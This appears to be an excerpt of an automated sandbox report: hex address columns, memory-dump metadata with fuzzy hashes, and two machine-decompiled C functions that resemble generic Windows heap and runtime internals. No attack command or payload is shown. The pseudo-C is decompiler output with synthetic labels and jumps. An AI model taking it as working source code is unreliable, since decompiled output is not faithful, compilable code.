                                                          0x00000000
                                                          0x0344db2a
                                                          0x0344db2c
                                                          0x0344db31
                                                          0x0344db33
                                                          0x0344db36
                                                          0x0344db39
                                                          0x0344db3b
                                                          0x0344db66
                                                          0x0344db66
                                                          0x0344db3d
                                                          0x0344db3d
                                                          0x0344db3e
                                                          0x0344db46
                                                          0x0344db47
                                                          0x0344db49
                                                          0x0344db4c
                                                          0x0344db53
                                                          0x0344db55
                                                          0x0344db58
                                                          0x0344db5a
                                                          0x0349b50a
                                                          0x0349b50f
                                                          0x0349b512
                                                          0x0344db60
                                                          0x0344db60
                                                          0x0344db63
                                                          0x0344db63
                                                          0x00000000
                                                          0x0344db63
                                                          0x0344db5a
                                                          0x0344db3b
                                                          0x0344db24
                                                          0x0344db69
                                                          0x0344db69
                                                          0x0344db6c
                                                          0x0344db6f
                                                          0x0344db74
                                                          0x0349b557
                                                          0x0349b557
                                                          0x0349b55e
                                                          0x0344db7a
                                                          0x0344db7c
                                                          0x0344db7f
                                                          0x0344db82
                                                          0x0344db85
                                                          0x00000000
                                                          0x0344db8b
                                                          0x0344db8b
                                                          0x0344db8d
                                                          0x0344db9b
                                                          0x0344db9b
                                                          0x0344db9d
                                                          0x0344dba0
                                                          0x0344dba2
                                                          0x0344dba4
                                                          0x0344dba7
                                                          0x0344dba9
                                                          0x0344dbae
                                                          0x0344dbae
                                                          0x0344dbb1
                                                          0x0344dbb4
                                                          0x0344dbb4
                                                          0x0344dbb7
                                                          0x0344dbba
                                                          0x0344dcd2
                                                          0x0344dcd4
                                                          0x00000000
                                                          0x0344dbc0
                                                          0x0344dbc0
                                                          0x0344dbd2
                                                          0x0344dbd7
                                                          0x0344dbda
                                                          0x0344dbdd
                                                          0x0344dbdf
                                                          0x00000000
                                                          0x0344dbe5
                                                          0x0344dbe5
                                                          0x0344dbee
                                                          0x0344dbf1
                                                          0x0349b541
                                                          0x0349b544
                                                          0x00000000
                                                          0x0349b546
                                                          0x0349b546
                                                          0x00000000
                                                          0x0349b546
                                                          0x0344dbf7
                                                          0x0344dbf7
                                                          0x0344dbfd
                                                          0x0344dbfd
                                                          0x0344dbff
                                                          0x0344dc0b
                                                          0x0344dc15
                                                          0x0344dc1b
                                                          0x0344dc1d
                                                          0x0344dc21
                                                          0x0344dc21
                                                          0x0344dc23
                                                          0x0344dc23
                                                          0x0344dc26
                                                          0x0344dc29
                                                          0x0344dc2b
                                                          0x00000000
                                                          0x00000000
                                                          0x0344dc31
                                                          0x0344dc34
                                                          0x0344dc36
                                                          0x0344dcbf
                                                          0x0344dcbf
                                                          0x0344dcc2
                                                          0x00000000
                                                          0x0344dc3c
                                                          0x0344dc41
                                                          0x0344dc43
                                                          0x00000000
                                                          0x0344dc45
                                                          0x0344dc45
                                                          0x0344dc47
                                                          0x00000000
                                                          0x0344dc4d
                                                          0x0344dc4d
                                                          0x0344dc50
                                                          0x0344dc52
                                                          0x0344dc55
                                                          0x0344dcfa
                                                          0x0344dcfe
                                                          0x0344dd08
                                                          0x0344dd0a
                                                          0x0344dd0c
                                                          0x00000000
                                                          0x0344dd12
                                                          0x0344dd15
                                                          0x0344dd2d
                                                          0x0344dd2f
                                                          0x0344dd32
                                                          0x0344dd35
                                                          0x00000000
                                                          0x0344dd35
                                                          0x0344dc5b
                                                          0x0344dc5b
                                                          0x0344dc5e
                                                          0x0344dc61
                                                          0x0344dc64
                                                          0x0344dc67
                                                          0x0344dc67
                                                          0x0344dc6a
                                                          0x0344dc6c
                                                          0x0344dc8e
                                                          0x0344dc8e
                                                          0x0344dc91
                                                          0x0344dc93
                                                          0x0344dcce
                                                          0x0344dcce
                                                          0x0344dc95
                                                          0x0344dc9c
                                                          0x0344dc6e
                                                          0x0344dc72
                                                          0x0344dc75
                                                          0x0344dc77
                                                          0x0344dc79
                                                          0x0349b551
                                                          0x0349b551
                                                          0x00000000
                                                          0x0344dc7f
                                                          0x0344dc7f
                                                          0x0344dc81
                                                          0x00000000
                                                          0x0344dc83
                                                          0x0344dc86
                                                          0x0344dc88
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0344dc88
                                                          0x0344dc81
                                                          0x0344dc79
                                                          0x0344dc6c
                                                          0x0344dc55
                                                          0x0344dc47
                                                          0x0344dc43
                                                          0x00000000
                                                          0x0344dc36
                                                          0x0344dc23
                                                          0x00000000
                                                          0x0344dbff
                                                          0x0344dbf1
                                                          0x0344dbdf
                                                          0x0344db8f
                                                          0x0344db92
                                                          0x0344db95
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0344db95
                                                          0x0344db8d
                                                          0x0344db85
                                                          0x0344db74
                                                          0x0344dc9f
                                                          0x0344dca2
                                                          0x0344dcb0
                                                          0x0344dcb0
                                                          0x0344dad1
                                                          0x0349b4e5
                                                          0x0349b4c8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0344d831
                                                          0x0344d80d
                                                          0x00000000
                                                          0x0344d800
                                                          0x0349b47f
                                                          0x0349b485
                                                          0x00000000
                                                          0x0349b485
                                                          0x0344d665
                                                          0x0344d652
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2adb944c7f7e062336ecb0af8e8039bbeef4f9120fe42f048731f938a4876bb1
                                                          • Instruction ID: 4719f352f529fccac3e5a6a537b9e91122c64a61a6a884f2183a4526d4b2840b
                                                          • Opcode Fuzzy Hash: 2adb944c7f7e062336ecb0af8e8039bbeef4f9120fe42f048731f938a4876bb1
                                                          • Instruction Fuzzy Hash: 95E19E34E00319CFEB34DF15C984B6AB7A5BF46304F0841ABD8195F3A2D774A986CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0344849B, Relevance: .3, Instructions: 290COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E0344849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x350f9c0);
				E0348D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x3527b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0344CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E03452280( *[fs:0x30], 0x3528550);
						_t139 =  *0x3527b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0346F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0344FFB0(_t193, _t235, 0x3528550);
								L5:
								return E0348D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E03431C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x3527b9c; // 0x0
							_t235 = L03454620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x3527b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0346A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0344FFB0(_t193, _t235, 0x3528550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L034577F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L034577F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x3527b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x3527b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E034737C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x3527b9c; // 0x0
									_t214 = L03454620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E034737F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x3527b10 =  *0x3527b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x3527b04 =  *0x3527b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L034577F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L034577F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x3527b08 =  *0x3527b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E034757C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0347F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L034577F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0346A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L034577F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E034796C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                          0x0344849b
                                                          0x0344849b
                                                          0x0344849b
                                                          0x0344849b
                                                          0x0344849d
                                                          0x034484a2
                                                          0x034484a7
                                                          0x034484b1
                                                          0x034484d8
                                                          0x00000000
                                                          0x034484b3
                                                          0x034484c4
                                                          0x034484c9
                                                          0x034484cd
                                                          0x034484cf
                                                          0x034484cf
                                                          0x034484d6
                                                          0x034484e6
                                                          0x034484e9
                                                          0x034484ec
                                                          0x034484ef
                                                          0x034484f2
                                                          0x034484f4
                                                          0x034484fc
                                                          0x03448501
                                                          0x03448506
                                                          0x03448509
                                                          0x034486e0
                                                          0x034486e5
                                                          0x034486e8
                                                          0x034486ed
                                                          0x034486f0
                                                          0x034486f2
                                                          0x03499afd
                                                          0x03499b02
                                                          0x034484da
                                                          0x034484df
                                                          0x034484df
                                                          0x034486fa
                                                          0x034486fd
                                                          0x034486fe
                                                          0x03448701
                                                          0x03448706
                                                          0x03448709
                                                          0x0344870b
                                                          0x00000000
                                                          0x00000000
                                                          0x03448711
                                                          0x03448725
                                                          0x03448727
                                                          0x0344872a
                                                          0x0344872c
                                                          0x03499af0
                                                          0x03499af5
                                                          0x03448732
                                                          0x03448732
                                                          0x03448732
                                                          0x03448735
                                                          0x03448737
                                                          0x03448515
                                                          0x03448515
                                                          0x03448518
                                                          0x0344851d
                                                          0x03448523
                                                          0x03448527
                                                          0x0344852b
                                                          0x03448537
                                                          0x03448539
                                                          0x0344853c
                                                          0x0344853e
                                                          0x0344868c
                                                          0x03448691
                                                          0x03448699
                                                          0x0344869b
                                                          0x03448744
                                                          0x03448748
                                                          0x034486a1
                                                          0x034486a1
                                                          0x034486a1
                                                          0x034486a4
                                                          0x034486a8
                                                          0x03499bdf
                                                          0x03499bdf
                                                          0x034486ae
                                                          0x034486b0
                                                          0x00000000
                                                          0x034486b6
                                                          0x00000000
                                                          0x03499be9
                                                          0x034486b0
                                                          0x03448544
                                                          0x0344854a
                                                          0x0344854d
                                                          0x03448551
                                                          0x0344876e
                                                          0x03448778
                                                          0x0344877b
                                                          0x03448780
                                                          0x03448557
                                                          0x03448557
                                                          0x0344855d
                                                          0x0344855d
                                                          0x0344856b
                                                          0x0344856e
                                                          0x03448570
                                                          0x03448573
                                                          0x03448576
                                                          0x03448576
                                                          0x03448579
                                                          0x0344857b
                                                          0x00000000
                                                          0x00000000
                                                          0x03448581
                                                          0x034485a0
                                                          0x034485a2
                                                          0x034485a5
                                                          0x034485a7
                                                          0x03499b1b
                                                          0x03499b1b
                                                          0x0344862e
                                                          0x0344862e
                                                          0x03448631
                                                          0x03448631
                                                          0x03448634
                                                          0x03448636
                                                          0x03448669
                                                          0x03448669
                                                          0x0344866b
                                                          0x03499bbf
                                                          0x03499bc4
                                                          0x03499bc8
                                                          0x03499bce
                                                          0x03499bce
                                                          0x03448671
                                                          0x03448671
                                                          0x03448674
                                                          0x03448676
                                                          0x03499bae
                                                          0x03499bae
                                                          0x03448676
                                                          0x0344867c
                                                          0x0344867e
                                                          0x03448688
                                                          0x03448688
                                                          0x00000000
                                                          0x0344867e
                                                          0x03448638
                                                          0x03448638
                                                          0x0344863b
                                                          0x0344863e
                                                          0x0344863f
                                                          0x03448642
                                                          0x03448645
                                                          0x03448648
                                                          0x0344864d
                                                          0x03499b69
                                                          0x03499b6e
                                                          0x03499b7b
                                                          0x03499b81
                                                          0x03499b85
                                                          0x03499b89
                                                          0x03499ba7
                                                          0x03499b8b
                                                          0x03499b91
                                                          0x03499b9a
                                                          0x03499b9f
                                                          0x03499b9f
                                                          0x03448788
                                                          0x0344878d
                                                          0x03448763
                                                          0x03448763
                                                          0x03448766
                                                          0x00000000
                                                          0x03448766
                                                          0x03499b70
                                                          0x00000000
                                                          0x03499b70
                                                          0x03448656
                                                          0x0344865a
                                                          0x0344865c
                                                          0x03448752
                                                          0x03448756
                                                          0x00000000
                                                          0x00000000
                                                          0x0344875e
                                                          0x00000000
                                                          0x0344875e
                                                          0x03448662
                                                          0x03448662
                                                          0x03448662
                                                          0x03448666
                                                          0x00000000
                                                          0x03448666
                                                          0x034485b7
                                                          0x034485b9
                                                          0x034485bc
                                                          0x034485bf
                                                          0x034485cc
                                                          0x034485d1
                                                          0x034485d4
                                                          0x034485db
                                                          0x034485de
                                                          0x034485e0
                                                          0x03499b5f
                                                          0x00000000
                                                          0x03499b5f
                                                          0x034485e6
                                                          0x034485ea
                                                          0x034486c3
                                                          0x034486c5
                                                          0x034486c8
                                                          0x034486ca
                                                          0x03499b16
                                                          0x00000000
                                                          0x03499b16
                                                          0x034486d6
                                                          0x034485f6
                                                          0x034485f6
                                                          0x034485f9
                                                          0x03448602
                                                          0x03448606
                                                          0x0344860a
                                                          0x0344860b
                                                          0x0344860e
                                                          0x03448611
                                                          0x00000000
                                                          0x03448611
                                                          0x034485f3
                                                          0x00000000
                                                          0x034485f3
                                                          0x03448619
                                                          0x0344861e
                                                          0x0344861e
                                                          0x03448621
                                                          0x03448622
                                                          0x03448623
                                                          0x03448625
                                                          0x0344862c
                                                          0x00000000
                                                          0x0344873d
                                                          0x00000000
                                                          0x0344873d
                                                          0x03448737
                                                          0x0344850f
                                                          0x03448512
                                                          0x00000000
                                                          0x03448512
                                                          0x00000000
                                                          0x034484d6

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e5cfa82ab3bedd0bdfc769b4cfa4d114dbdae742d511df7f4697915489fbc1bc
                                                          • Instruction ID: 81b91ce640a8780316cb02ec4a999854fa41834333799e2f35126e10fccbac91
                                                          • Opcode Fuzzy Hash: e5cfa82ab3bedd0bdfc769b4cfa4d114dbdae742d511df7f4697915489fbc1bc
                                                          • Instruction Fuzzy Hash: 23B15674E00209DFEB24DFA9C980AAEBBB9BF49304F14412FE415AF355D771A846CB48
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0346513A, Relevance: .3, Instructions: 258COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 67%
                                                          			E0346513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x352d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0347D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E03452280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L03454620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0347F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0344FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x352b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0347B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                          0x03465142
                                                          0x0346514c
                                                          0x03465150
                                                          0x03465157
                                                          0x03465159
                                                          0x0346515e
                                                          0x03465165
                                                          0x03465169
                                                          0x0346516c
                                                          0x03465172
                                                          0x03465176
                                                          0x0346517a
                                                          0x0346517a
                                                          0x0346517a
                                                          0x0346517f
                                                          0x034a6d8b
                                                          0x034a6d8e
                                                          0x034a6d91
                                                          0x034a6d95
                                                          0x034a6d98
                                                          0x034a6d9c
                                                          0x034a6da0
                                                          0x034a6da3
                                                          0x034a6da7
                                                          0x034a6e26
                                                          0x034a6e26
                                                          0x034a6e2a
                                                          0x034651f9
                                                          0x034651f9
                                                          0x034651fe
                                                          0x034a6e33
                                                          0x034a6e33
                                                          0x034a6e39
                                                          0x034a6e3d
                                                          0x034a6e46
                                                          0x034a6e50
                                                          0x00000000
